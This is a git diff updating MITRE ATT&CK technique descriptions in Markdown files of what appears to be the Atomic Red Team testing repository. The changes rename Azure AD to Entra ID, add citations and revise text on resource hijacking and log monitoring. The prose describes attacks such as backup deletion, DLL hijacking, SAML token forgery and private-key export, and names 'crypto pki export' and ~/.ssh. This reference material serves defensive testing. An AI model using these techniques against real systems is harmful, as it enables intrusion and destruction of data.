 <blockquote>Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) 
 
-Adversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</blockquote>
+Adversaries may accomplish this by disabling individual services of high importance to an organization, such as <code>MSExchangeIS</code>, which will make Exchange content inaccessible.(Citation: Novetta Blockbuster) In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)</blockquote>
 
 ## Atomic Tests
 
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index f1f38978fb..ee101f433c 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -15,7 +15,7 @@ A number of native Windows utilities have been used by adversaries to disable or
 
 On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)</blockquote>
+Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)</blockquote>
 
 ## Atomic Tests
 
diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md
index 2b22d6b000..da3b239791 100644
--- a/atomics/T1496/T1496.md
+++ b/atomics/T1496/T1496.md
@@ -2,11 +2,14 @@
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1496)
 <blockquote>Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 
 
-One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
+Resource hijacking may take a number of different forms. For example, adversaries may:
 
-Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)
+* Leverage compute resources in order to mine cryptocurrency
+* Sell network bandwidth to proxy networks
+* Generate SMS traffic for profit
+* Abuse cloud-based messaging services to send large quantities of spam messages
 
-Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)</blockquote>
+In some cases, adversaries may leverage multiple types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking 2023)</blockquote>
 
 ## Atomic Tests
 
diff --git a/atomics/T1526/T1526.md b/atomics/T1526/T1526.md
index 61f5297d34..9176b32fc1 100644
--- a/atomics/T1526/T1526.md
+++ b/atomics/T1526/T1526.md
@@ -1,8 +1,8 @@
 # T1526 - Cloud Service Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1526)
-<blockquote>An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+<blockquote>An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
 
-Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
 
 For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
 
diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md
index 32415d148c..e0af1ce6e2 100644
--- a/atomics/T1552.004/T1552.004.md
+++ b/atomics/T1552.004/T1552.004.md
@@ -4,7 +4,7 @@
 
 Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code> on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)
 
-When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)
+When a device is registered to Entra ID, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)
 
 On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `crypto pki export`.(Citation: cisco_deploy_rsa_keys) 
 
diff --git a/atomics/T1562/T1562.md b/atomics/T1562/T1562.md
index 8108eb1164..b92ae40e5e 100644
--- a/atomics/T1562/T1562.md
+++ b/atomics/T1562/T1562.md
@@ -2,9 +2,9 @@
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562)
 <blockquote>Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.</blockquote>
+</blockquote>
 
 ## Atomic Tests
 
diff --git a/atomics/T1572/T1572.md b/atomics/T1572/T1572.md
index 873cd14725..6cdd8219b0 100644
--- a/atomics/T1572/T1572.md
+++ b/atomics/T1572/T1572.md
@@ -6,7 +6,7 @@ There are various means to encapsulate a protocol within another protocol. For e
 
 [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) 
 
-Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. </blockquote>
+Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. </blockquote>
 
 ## Atomic Tests
 
diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md
index e8b00cf0b9..9ca13a150d 100644
--- a/atomics/T1574.001/T1574.001.md
+++ b/atomics/T1574.001/T1574.001.md
@@ -4,7 +4,7 @@
 
 There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
 Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
diff --git a/atomics/T1606.002/T1606.002.md b/atomics/T1606.002/T1606.002.md
index cadc75da65..a7f83add4e 100644
--- a/atomics/T1606.002/T1606.002.md
+++ b/atomics/T1606.002/T1606.002.md
@@ -4,7 +4,7 @@
 
 An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)</blockquote>
+An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)</blockquote>
 
 ## Atomic Tests
 
diff --git a/atomics/T1649/T1649.md b/atomics/T1649/T1649.md
index 9b950147d6..c8ce799c98 100644
--- a/atomics/T1649/T1649.md
+++ b/atomics/T1649/T1649.md
@@ -1,6 +1,6 @@
 # T1649 - Steal or Forge Authentication Certificates
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1649)
-<blockquote>Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+<blockquote>Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
 Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
diff --git a/atomics/T1654/T1654.md b/atomics/T1654/T1654.md
index da649736ad..e8d655c3c7 100644
--- a/atomics/T1654/T1654.md
+++ b/atomics/T1654/T1654.md
@@ -4,7 +4,9 @@
 
 Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
-Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.</blockquote>
+Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)</blockquote>
 
 ## Atomic Tests